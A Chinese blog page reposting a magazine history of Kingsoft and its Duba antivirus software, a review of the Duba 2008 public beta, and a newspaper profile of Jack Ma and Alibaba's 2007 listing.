    “应该来说WPS业务还没有获得稳定持续的盈利,有时候赚钱有时候不赚钱.”雷军也认识到虽然强调通用软件,但金山更多的还是在依靠网游.但民族软件起家的金山,心中的软件梦从未停止.“我们会坚持把WPS做好,因为我们有比较强的盈利能力以后,支持WPS会更有力度.”雷军说.

    雷军曾经表示过,金山在网游行业的近期目标是前三名,当记者提起这个目标的时候,雷军并不太在意.“我进入这个领域绝对不是冲前三来的,否则我们就不用为一款游戏准备五年以上.”雷军说,“我做事是比较有自信的,也比较有野心,这个好像是我的特点.”

    “未来两年时间里面,金山团队要再翻一番,从1000到2000,作为一家技术公司首先要进行研发.未来我们会专注在两个业务方向,三个核心业务上,业务方向就是网游和软件,三个核心业务就是WPS,毒霸和网络游戏.”雷军把金山未来的发展方向定位得非常明确.

    上市给了雷军、给了金山一个支点,之后,他们能跷起什么呢?我们拭目以待.

    一名普通的反病毒工程师,1998年加入金山,从事毒霸的研发工作,一待就将近10年,见证了金山的起起伏伏,更见证了金山毒霸的起起落落.这是他对金山毒霸的10年历史的记忆,也是对于金山的记忆.一个反病毒工程师的10年记忆

    金山软件反病毒工程师    靳山

    在被盗版围追堵截多年的金山终于发现了杀毒市场这片大草原.

    1997的中国软件市场,流行着这样一句话,什么软件都可以用盗版的,但是杀毒软件一定要买一套正版.

    雷军后来回忆说,“虽然金山词霸已经在中国市场占据了绝对领先的地位,但是用户持续付费的黏性不强.不像杀毒软件,随着病毒的不断出现,用户对杀毒软件的需求将会越来越强.公司要持续发展,就需要这样的产品.”

    1997年的秋天,金山公司成立了反病毒研发小组,卢新冬任组长,同时也是唯一的组员.从那时开始,卢新冬一个人蜷在珠海金山四楼的左边角落里,每天从早到晚孤军奋斗着.他的使命就是研发金山的第一个杀毒引擎.

    1998年4月,卢新冬迎来了他的第一个真正的组员,陈飞舟,毒霸二号员工,也是在今后几年真正将毒霸产品引向辉煌的人.即使到1999年底毒霸第一款产品公测时,整个毒霸也只有5个人.由陈飞舟创立的作品风格一直被金山毒霸延续到现在.

    1998年卢新冬已经写了一个简单的杀毒引擎.1999年2月,第一个调试通过的金山反病毒产品终于可以稳定运行了.

    毒霸的第一款产品在1999年4月公测时,杀毒数量已经完全赶上了当时非常具有知名度的江民.而截至1998年,中国的电脑流行病毒加起来总共不超过2000个,1999年流行病毒也不会比1998年多出多少.

    以互联网的名义

    金山的第一款反病毒产品叫什么名字好呢?从1999年2月到4月,金山掀起了一股起名热潮.从“金山杀毒王”,到“金山毒王”,从“金山除毒”到“金山毒霸”,最后雷军一锤定音:还是叫“金山毒霸”吧.

    从1999年4月开始,金山毒霸测试版以完全免费的姿态高调进入互联网.通过包括新浪、搜狐等著名网站在内的200多家网站下载,以及中国计算机报、电脑报等10余家媒体配套光盘的发放,至少有150万人参加了这场公开测试活动.但是,要杀入竞争残酷的杀毒市场,光有这些远远不够.

    杀毒引擎更是重中之重.在陈飞舟的带领下,2000年6月,金山毒霸完全自主创新的杀毒引擎二代问世了.2000年11月,金山毒霸正式版终于问世了.当时很多用户都使用两套杀毒软件,研发团队同意了为了让产品更有市场卖点接受双引擎的设计.

    凭着金山在中国软件行业闯荡十二年的威望和经验,在金山毒霸的第一次订货会上,经销商首次订货的回款就达到千万以上.

    “蓝色安全革命”的辉煌

    进入新千年,金山进行了“缉毒万里行”的活动,不仅开创了中国杀毒软件的全新营销模式,更跑顺了金山毒霸的市场、渠道和研发体系的整体配合模式,更给金山毒霸整个团队增加了必胜的信心.

    2002年9月11日,北京中关村(行情论坛) 海龙大厦门口一个巨幅背版“蓝色安全革命”开始引起过路人群纷纷驻足围观.金山毒霸2003由199元降至50元,金山网镖2003由129元降至50 元,包含金山毒霸、金山网镖2003的安全套装组合由原价239元降至90元.一条长达10米左右的万人签名条幅,一条长长的现场抢购金山毒霸2003的队伍拉开了这场热点的序幕.

    蓝色安全革命结束后,金山毒霸的市场份额曾一度达到业内领先.同时瑞星、江民等同行的销量也都极大的增加,整个行业的盘子被金山毒霸扩大了.

    低谷后的涅磐

    进入2003年,金山开始将业务重心放到了网络游戏上来.为了支援网游业务,很多资深的金山毒霸研发工程师被调到网游研发部门,支援网游的研发工作,金山毒霸团队陷入前所未有的低谷.

    此时,金山毒霸研发团队以巨大的毅力和决心筹划将以前所写的毒霸所有代码全部推翻重写.将历时6年的积累全部推翻重写,这需要巨大的决心和毅力,也是一个浩大的工程,更是一种巨大的代价.但从此刻开始,金山毒霸开始重视每一个细节,重视用户的每一次体验和感受.

    在这种观念的指引下,金山毒霸不断前行.2003年,国内第一个自主研发的杀毒引擎蓝芯引擎问世.这是历时6年才磨成一剑的杀毒引擎,金山将它的代号命名为 “蓝芯”.蓝芯引擎在病毒分析、邮件杀毒、内存杀毒和压缩包杀毒等重要指标方面,已具备业界顶尖的技术水准.在当年公安部最新杀毒软件检测中,金山毒霸凭借“蓝芯”的出色表现一举拿到了95分的高分,同时获得了一级品的黄标,这是国内杀毒软件极高水准的标志.

    2005 年,金山毒霸进入日本.半年后,据日本知名IT杂志ASCII调查报告显示,截至2006年2月14日,金山毒霸在日本的下载量达到100万,比预计提前 7个月完成目标.2006年9月,金山毒霸的下载量超过200万,付费用户为25%.金山毒霸跻身日本杀毒市场前5名.

    2007年8月,金山毒霸成为国内率先通过VB100这一世界最权威的反病毒认证的国产杀毒软件,填补了国产杀毒软件若干年集体缺席VB100的尴尬局面;随后金山毒霸又再一次通过了另一大权威认证checkmark二级认证,充分印证了金山毒霸的技术回归.

    这就是转变,彻底的转变.企业是要赚钱的,但是赚钱不是企业的唯一目的,也不是企业的唯一价值,更不是人生的唯一意义.从厂商到公民,从技术立业到市场主导,然后再次回归技术和用户本身,步履蹒跚的十年里程,金山毒霸走出了一个大大的V字,也走出了一个大大的人字.

    文/《中国经济周刊》

    改进不多:金山毒霸2008公测版探秘

    出处:PConline  作者:小云

    2007年10月9日,金山软件在香港联交所挂牌上市。与此之前,金山软件旗下金山毒霸也推出了最新的2008公测版,可谓动作连连。在2007年底各安全厂商纷纷大推自己的新版杀毒软件之时,金山此次放出的2008公测版到底告诉了我们哪些?且听以下慢慢道来。

      一、软件信息 

    下载地址:http://cu001.www.duba.net/duba/download/insta ... A080715.2008.01.EXE


    二、寻找亮点

      由于金山毒霸2008宣称彻底兼容Windows Vista系统,因此此次试用选用了Vista环境。

      1、安装阶段

      从其安装程序来看,2008版是一个组合套装,内容包括金山网镖、金山清理专家和金山杀毒软件,如图1所示;整个程序安装完毕所需空间大致在143MB左右。



    图1金山毒霸2008安装界面

      安装结束时同样会弹出金山经典的一些壁纸选择,而且其非常人性的提供了普通CRT显示器和LCD宽频液晶显示器的不同规格图片。然后是进行软件的初始运行配置以及病毒库升级,都选用推荐设置选项即可,如图2、3所示。



    图2 注册组件



    图3 升级文件

    由于是公测版,所以整个升级过程并不需要通行证及相关的认证措施,所以可以非常方便快捷的完成升级过程。然后重新启动计算机即可使用。从整安装过程来看,人性化、方便快捷是最主要的特点;其中的亮点不是很鲜明。

      2、功能总览

      据公测报告称,此次新版本加入了恶意行为拦截、抢先杀毒等技术,并对网页木马防范作了加强。其实像恶意行为拦截一类的技术并不是什么新鲜技术,通过后期的试用才发现,倒是毒霸2008的系统安全增强计划的参与功能还较有特色,参与该计划将有助于发现系统中的潜在病毒、木马以及恶意软件;并且通过互联网的安全认证机制,迅速反馈到金山毒霸2008的监控中,可以大大增强系统的安全性。



    图4 毒霸2008安全监控中心

      3、病毒查杀

      首先看了看对系统的病毒扫描与查杀,在"快捷方式"操作界面下,选择全盘查杀后启动查杀任务的反应速度还是较理想,倒是开始工作时的系统资源占用猛增,如图5所示。另一个有关查杀的操作功能是可以通过主菜单中的"操作/定制杀毒"命令,来为特定的查杀位置建立桌面快捷方式。



    图5 查杀工作

      另外就是金山毒霸较有特色的在线查毒功能,也被放置在了主菜单的"操作"菜单项下,用户单击后即可链接到在线查毒站点;另外还有在"综合设置"界面中的"屏保杀毒"、"定时杀毒"等,共同构成了毒霸2008多样的病毒查杀手段。

    4、主动防御

      这是目前新版杀毒软件普遍加入的安全措施。此项措施其实就是对试图访问系统注册表、试图在系统下运行的程序、进程进行先期的侦测并配合金山网镖告知用户,以采用必要的安全处理,如图6所示。



    图6 金山网镖安全提示

      进入"综合设置"窗口,也可以就防御功能的一些具体参数作配置,比如提示方式、实时防毒、嵌入式防毒等,如图7所示。



    图7 防御设置

      金山毒霸 2008另一个主动防御特色就是"主动漏洞修补",这与之间瑞星2007的手动漏洞修补功能不同的是,该功能可扫描操作系统及各种应用软件的漏洞,当新的安全漏洞出现时,会下载漏洞信息和补丁,经扫描程序检查后自动帮助用户修补。

    5、隐私保护

      这相当于一个私人保险柜,用户可以将一些个人敏感的数据信息编辑到其中,一旦木马或间谍软件试图通过邮件盗取数据,金山毒霸 2008会报警并提示用户,确保用户的重要数据不会外泄。如图8所示,首先设置密码,然后单击旁边的添加按钮实施数据添加即可。



    图8 设定隐私保护

      6、恶意隐患防范

      在金山毒霸 2008中提供了两类恶意防范机制,一是"可疑文件扫描"(可以通过"工具/可疑文件扫描"命令启动),二是垃圾邮件防范;两项措施都非常实用,再配合金山毒霸 2008中的"清理专家"工具,可以实现较为理想的清理操作。



    图9可疑文件扫描与垃圾邮件防范设置

      至于"金山清理专家",由于其单独版本早已面市,所以这里不做详细说明;其比较有特色的就是"为系统打分"以及通过检查后提供的诊断措施,可以方便用户快速的修补系统安全防患。



    图10 金山清理专家

    7、金山网镖

      这是金山毒霸 2008套装中另一组件,安装完成并重启后即会自动运行,其主要作用就是防火墙功能,用户可以使用其对系统进程安全、网络访问安全进行监控,并可根据实际情况设置访问规则;类似Windows系统的防火墙功能。



    图11 金山网镖

      三、探秘总结

      平心而论,此次的金山毒霸 2008公测版本,个人感觉除了最初的病毒库升级不需要通行证支持外,在功能上用户可以直观感受到的亮点并不多,主动防御、安全计划、隐私保护等功能我们平常也都有接触。或许金山公司就是想在2008版本中提倡功能设置简单化、安全防范自动化的理念呢?

    Tag:金山 互联网 金山毒霸 评测
    chapi 发表于21时33分27秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2007年10月29日

    马云:一个网络狂人的财富轨迹 - [IT业界]

    作者:陈亮 | 出处:南方日报

      阿里巴巴这个曾经被人们认为难以上市的公司终于上市了,不仅如此,国际配售1800亿美元的认购,散户认购4200亿港元的认购更创下香港股票市场公开发售冻结资金之最。

      这次上市也让久未公开露面的马云重新回到了人们的视野。有人计算他的个人财富在上市之后有望突破50亿元。也有人推测出阿里巴巴有近1000名员工将成为拥有超过100万港元身家的富翁。

      事实上,市面上有很多关于马云的说法,有人说他是个智者,有人认为他是个狂人;有人认为他激情四溢,有人却指责他惯于忽悠;可是不管怎么说,他都是个英雄,一个让人琢磨不透的英雄,因为他不断地做到其他人做不到的事,成就着我们这个时代关于创业的梦想,关于财富的梦想,关于奋斗的梦想。  

      从“差生”到英语教师  

      小学考重点中学,考了三次没有考上,大学也是考了三次才最终如愿——这基本上算是一个习惯意义上的“差生”了。  

      1964年9月10日,马云出生在杭州一户普通人家。在求学时代,马云可谓是个顽童。连马云也曾笑言自己小学考重点中学,考了三次没有考上,大学也是考了三次才最终如愿——这基本上算是一个习惯意义上的“差生”了。

      算不上好学生的马云唯一值得骄傲的就是他的英语。刚改革开放之际,到杭州旅游的外国人多起来,马云一有机会就在西湖边逮着人家练习英语,尽管开始的时候他的英语还很蹩脚,可是时间长了,他竟然说的一口流利的英语,并且一直用到今天。

      考上杭州师范学院后,马云当选为学生会主席,后来又成为杭州市学联主席。这个时候的他已经洗脱了“差生”的印记,开始崭露头角。

      1988年,大学毕业后的马云去杭州电子工业学院担任英语老师。后来担任阿里巴巴副总裁的戴珊就是那个时候马云的学生,她回忆到,那个时候的马云已经成为学生们最喜欢的老师,“他的课是到课率最高的,他并不强制点名,但是学生们都喜欢听他讲,他经常给大家讲做人的道理。”

      尽管深受学生们的欢迎,但是当时马云的工资每月仅仅110元左右。不甘寂寞的他找了不少兼职,并利用课余时间为到杭州观光的外国游客担任导游,不过这样的零工对收入并没有显著的帮助。

      1992年,马云和朋友一起成立了杭州最早的专业翻译社“海博翻译社”,课余四处活动接翻译业务。当时经营特别艰难,经常入不敷出。马云一看这样不行,就背着口袋到义乌、广州去进货,卖礼品、包鲜花,用这些钱养了翻译社3年,才开始收支平衡。 

      从害怕电脑到互联网公司老板  

      很多人刚刚接触互联网思考的是背后的技术问题,而马云却想的是商业模式问题。  

      翻译社没给马云带来什么钱,倒是让他有了一次出国的机会。在美国,马云第一次在朋友那里接触了互联网。不过那个时候的马云对电脑甚至有一种恐惧:“我甚至害怕触摸电脑的按键。我当时想:谁知道这玩艺儿多少钱呢?我要是把它弄坏了就赔不起了。”

      对马云有触动的是,他好奇地对朋友说在搜索引擎上输入单词“啤酒”,结果只找到了美国和德国的品牌。当时他就想应该利用互联网帮助中国的公司为世界所熟悉。

      事实上,尽管今天已经可以号称互联网大亨的马云对技术依旧不太懂,但是他对互联网的理解却比谁都深刻。很多人刚刚接触互联网思考的是背后的技术问题,而马云却想的是商业模式问题。

      有了想法就做,回国后的马云迅速辞了职,借了2000美元,1995年4月开办了“中国黄页”,这是中国第一批网络公司之一。1997年底,马云和他的团队在北京开发了外经贸部官方站点、网上中国商品交易市场等一系列政府站点。

      但是因为种种原因,马云发现在体制内的职业生涯明显不太适合他。1999年初,他放弃了在北京的一切,决定回到杭州创办一家能为全世界中小企业服务的电子商务站点。回到杭州后,马云和最初的创业团队开始谋划一次轰轰烈烈的创业。大家决定不向亲戚朋友借钱,集资了50万元,据点就在马云位于杭州湖畔花园的100多平米的家里,阿里巴巴就在这里诞生了。

      这个创业团队里除了马云之外,还有他的妻子、他当老师时的同事、学生,以及被他吸引来的精英,比如阿里巴巴首席财务官蔡崇信,当初抛下一家投资公司的中国区副总裁的头衔和75万美元的年薪,来领马云几百元的薪水。

      他们都记得,马云当时对他们所有人说:“我们要办的是一家电子商务公司,我们的目标有三个:第一,我们要建立一家生存102年的公司;第二,我们要建立一家为中国中小企业服务的电子商务公司;第三,我们要建成世界上最大的电子商务公司,要进入全球网站排名前十位。”  

      从小虾米到巨无霸  

      狂言狂语某种意义上来说,只是当时阿里巴巴的生存技巧而已。  

      阿里巴巴成立初期,公司是小到不能再小,18个创业者往往是身兼数职。马云后来也回忆到,当时出门打车,看到桑塔纳来了,举起的手又放下了,非要等到夏利为止,因为后者便宜。

      不过好在网站的建立让阿里巴巴开始逐渐被很多人知道。来自美国的《商业周刊》还有英文版的《南华早报》最早主动报道了阿里巴巴,并且令这个名不见经传的小网站开始在海外有了一定的名气。

      前几年,很多人指责马云老是狂言狂语,其实这并不能怪他,在公司还是小虾米的时候,如何让自己的公司成名呢?拼广告费明显不是那个时候阿里巴巴的强项,唯一能依靠的就是媒体的力量。狂言狂语某种意义上来说,只是当时阿里巴巴的生存技巧而已。

      不过有了一定名气的阿里巴巴很快也面临到资金的瓶颈:公司账上没钱了。现在担任阿里巴巴副总裁的彭蕾当时是负责管钱的,她回忆到,当时马云开始去见一些投资者,但是他并不是有钱就要,而是精挑细选。即使囊中羞涩,他还是拒绝了38家投资商。马云后来表示,他希望阿里巴巴的第一笔风险投资除了带来钱以外,还能带来更多的非资金要素,例如进一步的风险投资和其他的海外资源。而被拒绝的这些投资者,并不能给他带来这些。

      就在这个时候,现在担任阿里巴巴CFO的蔡崇信的一个在投行高盛的旧关系为阿里巴巴解了燃眉之急。以高盛为主的一批投资银行向阿里巴巴投资了500万美元。这一笔“天使基金”让马云喘了口气。

      更让他预料不到的是,更大的投资者也注意到了他和阿里巴巴。1999年秋,日本软银的总裁孙正义约见了马云。孙当时是亚洲首富,资产达3兆日元。孙正义直截了当地问马云想要多少钱,而马云的回答却是他不需要钱。孙正义反问道:“不缺钱,你来找我干什么?”马云的回答却是:“又不是我要找你,是人家叫我来见你的。”

      这个经典的回答并没有触怒孙正义。第一次见面之后,马云和蔡崇信很快就在东京又见到了孙正义。孙正义表示将给阿里巴巴投资3000万美元,占30%的股份。但是马云认为,钱还是太多了,经过6分钟的思考,马云最终确定了2000万美元的软银投资,阿里巴巴管理团队仍绝对控股。 

      冬天之后的春天  

      马云终于攀上了他自己设定的高峰,而这,可能还仅仅只是开始。  

      从2000年4月起,纳斯达克指数开始暴跌并持续了长达两年的低迷不振状态,这让很多互联网公司陷入了困境,甚至关门倒闭。但是阿里巴巴却安然无恙。

      很重要的一个原因,是阿里巴巴获得了2500万美元的融资,而这个网站从来没有乱花钱的习惯。更重要的是马云那坚持不懈的信念。当时他对他的同事们说:“我们即使跪着活,只要活着一天。”

      那个时候,全社会对互联网产生了一种不信任,阿里巴巴尽管不缺钱,业务也开展地分外艰难。马云提出关门把产品做好,等到春天再出去。

      即使在后来遭遇到“非典”之时,马云的永不放弃的信念依然感染着公司里的每一个人。所有的人都在家办公,但是业绩却不降反升,成为一个奇迹。

      冬天很快就过去了,互联网的春天在2003年开始慢慢走来。2004年2月17日,马云在北京宣布,阿里巴巴再获8200万美元的巨额战略投资。这笔投资,是当时国内互联网金额最大的一笔私募资金。

      之后的故事大家都已经很熟悉了,创办淘宝网,创办支付宝、收购雅虎中国,创办阿里软件,一直到今天走向上市。马云终于攀上了他自己设定的高峰,而这,可能还仅仅只是开始。

    Tag:马云 互联网
    chapi 发表于21时29分38秒 | 阅读全文 | 评论 0 | 编辑 | 分享
共42页 第一页 上一页 1 2 3 4 5 6 7 8 9 10 下一页 最后一页

Lessons by English, baby!

随时随地看wap